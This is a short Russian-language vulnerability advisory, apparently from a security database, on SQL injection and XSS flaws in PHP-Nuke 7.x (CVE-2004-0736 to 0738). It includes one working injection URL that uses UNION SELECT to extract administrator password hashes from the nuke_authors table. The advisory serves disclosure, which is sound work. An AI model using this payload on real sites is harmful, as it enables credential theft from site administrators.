Несколько уязвимостей в PHP-Nuke

Дата публикации:
18.07.2004
Всего просмотров:
1761
Опасность:
Средняя
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
CVE-2004-0736
CVE-2004-0737
CVE-2004-0738
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
Раскрытие важных данных
Неавторизованное изменение данных
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
PHP-Nuke 7.x
Уязвимые версии: PHP-Nuke

Описание: Несколько уязвимостей в PHP-Nuke позволяют удаленному пользователю выполнить SQL команды и XSS нападение.

1. SQL инъекция:

 http://localhost/nuke73/modules.php?name=Search&type=comments&
query=not123exists&instory=/**/UNION/**/SELECT/**/0,0,pwd,0,aid/**/FROM/**/nuke_authors
2. /modules/Search/index.php' не фильтрует HTMl код в поле поиска.

URL производителя:http://www.phpnuke.org/

Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Ссылки: Multiple security holes in PhpNuke - part 2

или введите имя

CAPTCHA